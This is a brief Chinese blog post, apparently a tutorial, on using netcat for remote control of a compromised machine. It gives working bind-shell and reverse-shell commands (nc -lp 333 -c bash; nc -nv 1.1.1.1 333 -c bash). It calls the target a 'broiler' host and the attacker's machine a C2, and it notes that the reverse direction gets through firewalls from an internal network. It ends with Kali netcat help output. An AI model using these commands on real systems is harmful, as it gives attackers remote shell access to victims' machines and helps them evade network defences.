nc 远程控制

=== nc 做远程控制 ===

原理实际上和之前的传文本一样,服务器端起监听,客户端端去链接,之后监听的服务器端传一个自己的shell过去到客户端

正向:侦听方为肉鸡,C2 访问肉鸡

SERVER: nc -lp 333 -c bash

CLIENT: nc -nv 1.1.1.1 333


或者反向:侦听方为C2,肉鸡访问C2

SERVER :nc -lp 333

CLIENT : nc -nv 1.1.1.1 333 -c bash

-c shell command。也就是要使用的shell。windows下用cmd


注意,谁使用-c bash,谁就是肉鸡。肉鸡发 shell。反向的可以用来穿墙。因为是从肉鸡,从内网,向外(攻击者的C2电脑)发起访问。

类似的原理可以用在其他协议的穿墙上。比如ftp的passive和active mode

root@kali:~/Documents# nc -h
[v1.10-41]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:    nc -l -p port [-options] [hostname] [port]
options:
    -c shell commands    as `-e'; use /bin/sh to exec [dangerous!!]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值